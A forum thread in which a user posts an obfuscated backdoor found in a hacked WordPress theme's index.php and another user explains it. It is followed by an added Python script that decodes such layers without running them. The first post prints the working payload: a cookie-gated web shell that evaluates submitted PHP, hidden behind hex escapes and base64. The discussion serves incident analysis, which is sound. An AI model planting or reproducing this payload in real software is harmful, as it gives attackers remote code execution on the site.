Strange PHP code in Wordpress theme

mecha_godzilla
Forum Contributor
Posts: 375
Joined: Wed Apr 14, 2010 4:45 pm
Location: UK

Post by mecha_godzilla »

Hi,

A friend of mine's WordPress site got hacked recently and I'm going through all the files to try and work out what happened. I won't mention the theme in question here but there are four suspect files - three of them are JavaScripts that have had document.write() appended to them to load in 3rd-party sites into an iframe in the main template, but the fourth file (index.php) has the following code right at the top:

preg_replace("/.+/esi","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'aWYgKCFlbXB0eSgkX0NPT0tJRVsndiddKSBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXtpZiAoIWVtcHR5KCRfUE9TVFsnYyddKSkge2VjaG8gJzx0ZXh0YXJlYSByb3dzPTI4IGNvbHM9ODA+JzsgJGQ9YmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgnICcsJysnLCRfUE9TVFsnYyddKSk7aWYoJGQpIGV2YWwoJGQpOyBlY2hvICc8L3RleHRhcmVhPic7fQ0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD1wb3N0Pjx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjggbmFtZT1jPjwvdGV4dGFyZWE+PGJyPjxpbnB1dCB0eXBlPXN1Ym1pdD48L2Zvcm0+JztleGl0O30='\x29\x29\x3B",'1');

Anyone have any idea how to "decode" this, or work out what it's doing?

Thanks in advance,

Mecha Godzilla
requinix
Spammer :|
Posts: 6617
Joined: Wed Oct 15, 2008 2:35 am
Location: WA, USA

Re: Strange PHP code in Wordpress theme

Post by requinix »

The /e flag tells preg_replace() to evaluate the replacement string as PHP code. That's the first warning that it's malicious.

There are only two layers of obfuscation, the second being a common eval(base64_decode(...)). The result is something which allows someone with $_COOKIE["v"] == "d" to see a form which allows them to submit and evaluate PHP code.
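
An added example, not part of the original posts: one way to peel the two layers described above as plain text, without running any PHP. The names `peel`, `indicators`, `hex_escape`, `INNER` and `SAMPLE` are hypothetical, and the sample line is constructed with a harmless inner payload in the same shape as the posted one.

```python
import base64
import re

# preg_replace("/pattern/flags", "replacement", ...): capture the flags and the replacement
PREG = re.compile(r'preg_replace\(\s*"/(?:\\.|[^/\\])*/([a-zA-Z]*)"\s*,\s*"((?:\\.|[^"\\])*)"')
HEX_ESC = re.compile(r'\\x([0-9A-Fa-f]{1,2})')
B64_EVAL = re.compile(r'''eval\(\s*base64_decode\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)''')
INDICATORS = ("eval(", "$_COOKIE", "$_POST", "$_REQUEST", "base64_decode(")

def unescape_hex(s):
    """Resolve PHP double-quoted \\xNN escapes as text; nothing is executed."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)

def peel(php_line, max_layers=10):
    """Return (uses_e_flag, layers); each layer is one decoded stage as text."""
    m = PREG.search(php_line)
    uses_e = bool(m and "e" in m.group(1))
    current = unescape_hex(m.group(2)) if m else php_line
    layers = [current]
    for _ in range(max_layers):  # bounded, in case layers are nested deeply
        inner = B64_EVAL.search(current)
        if not inner:
            break
        current = base64.b64decode(inner.group(1)).decode("utf-8", "replace")
        layers.append(current)
    return uses_e, layers

def indicators(text):
    """List the review-worthy constructs present in a decoded layer."""
    return [i for i in INDICATORS if i in text]

def hex_escape(s):
    """Helper used only to build the constructed sample below."""
    return "".join("\\x%02X" % ord(c) for c in s)

# Constructed sample: same wrapping as the posted line, harmless inner code.
INNER = "if (!empty($_COOKIE['k'])) { echo 'constructed sample'; }"
SAMPLE = 'preg_replace("/.+/esi","%s\'%s\'%s",\'1\');' % (
    hex_escape("eval(base64_decode("),
    base64.b64encode(INNER.encode()).decode(),
    hex_escape("));"))

if __name__ == "__main__":
    uses_e, layers = peel(SAMPLE)
    print("/e modifier present:", uses_e)
    for n, layer in enumerate(layers, 1):
        print("layer %d: %s  indicators=%s" % (n, layer, indicators(layer)))
```

The same `peel()` call accepts a suspect line copied from a theme file as a string, so the decoded layers can be read and searched without the code ever being evaluated.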
mecha_godzilla
Forum Contributor
Posts: 375
Joined: Wed Apr 14, 2010 4:45 pm
Location: UK

Re: Strange PHP code in Wordpress theme

Post by mecha_godzilla »

Ok, that sounds about as ominous as I was expecting :mrgreen:

Thanks for your help,

M_G